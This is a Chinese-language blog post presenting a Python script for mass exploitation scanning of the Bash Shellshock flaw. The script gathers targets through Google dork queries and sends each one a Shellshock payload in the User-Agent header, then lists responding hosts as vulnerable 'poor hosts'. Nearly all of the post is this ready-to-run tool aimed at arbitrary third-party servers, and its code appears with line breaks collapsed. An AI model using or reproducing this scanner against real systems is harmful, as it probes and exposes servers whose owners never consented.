admin管理员组

文章数量:1516870

Bash Shellshock(Bash远程代码执行)漏洞批量利用脚本

Bash远程代码执行漏洞的威力确实要比心脏滴血大很多,但是影响范围不是很广泛,不过昨天的分析文章Bash远程代码执行漏洞分析中末尾提到了这个漏洞的批量问题。
其中最最简单的方法就是使用搜索引擎的hacking技术,这里我使用的Google Hacking语法结合Google API来进行链接的抓取。只不过在国内的话。。。。需要加代理。
程序中的代理是我本地的goagent代理,端口是8087。如何检测漏洞思路也很简单,我这里直接根据服务器返回码进行判断的。

思路就是以上这些,下面还是和往常一样,贴代码:

 

#coding=utf-8
import requests
import json
import sys
import threading
import socket
vul_res = []
class GoogleURLProvider():def __init__(self,pageCount,proxies):self.pageCount = pageCount #查询的页数self.keywords = r'inurl:cgi-bin filetype:sh'self.apiurl = ""self.proxies = proxiesdef getRequest(self,url):return requests.get(url,proxies=self.proxies,verify=False)def getUrls(self):ret_list = []tmp_list = []for x in xrange(0,self.pageCount):url = "{apiurl}?v=1.0&q={keywords}&rsz=8&start={pageCount}".format(apiurl=self.apiurl,keywords=self.keywords,pageCount=x)try:r = self.getRequest(url)	results = json.loads(r.text)if not results:continueinfos = results['responseData']['results']if infos:for i in infos:tmp_list.append(i['url'])except Exception, e:continueret_list = ret_list + tmp_listreturn ret_listclass BashRCEDetector():def __init__(self,urls):self.urls = urlsdef detector(self):global vul_resfor x in self.urls:#多线程执行each = EachWorker(x)each.start()each.join()'''线程工作类'''
class EachWorker(threading.Thread):def __init__(self,url):threading.Thread.__init__(self)self.url = urldef run(self):global vul_resuseragent_header = {'User-Agent':'''() { 1;}; echo 'eee'''}try:r = requests.get(self.url,headers = useragent_header,timeout=8)if r.status_code == 500:print "{url} has Bash RCE vulnerability".format(url=self.url)vul_res.append(self.url)else:passexcept socket.timeout, e:passexcept requests.exceptions.Timeout, e:passexcept requests.exceptions.ConnectionError, e:passif __name__ == '__main__':print 'Powered by:Exploit QQ:739858341'print 'This is a program which you can use to scan the BashRCE vulnerability\nScanner working,please wait....'if len(sys.argv) != 2:print 'Usage:python BashRCEScanner <google pageCount>'sys.exit()#goagent proxy#在这里修改,加入你自己的代理即可使用proxies = {'http':"http://127.0.0.1:8087",'https':"http://127.0.0.1:8087"}url_res = []vul_guys = []urlgetter = GoogleURLProvider(int(sys.argv[1]),proxies)url_res = urlgetter.getUrls()bash_detector = BashRCEDetector(url_res)bash_detector.detector()if len(vul_res) == 0:print 'This group have no vulnerability'else:print 'Find %d poor host(s)' % len(vul_res)

 

 

 

 

 

运行截图:

 

 

本文标签: Bash Shellshock(Bash远程代码执行)漏洞批量利用脚本

版权声明:本文标题:Bash Shellshock(Bash远程代码执行)漏洞批量利用脚本 内容由网友自发贡献,该文观点仅代表作者本人, 转载请联系作者并注明出处:https://www.betaflare.com/web/1687509011a110342.html, 本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容,一经查实,本站将立刻删除。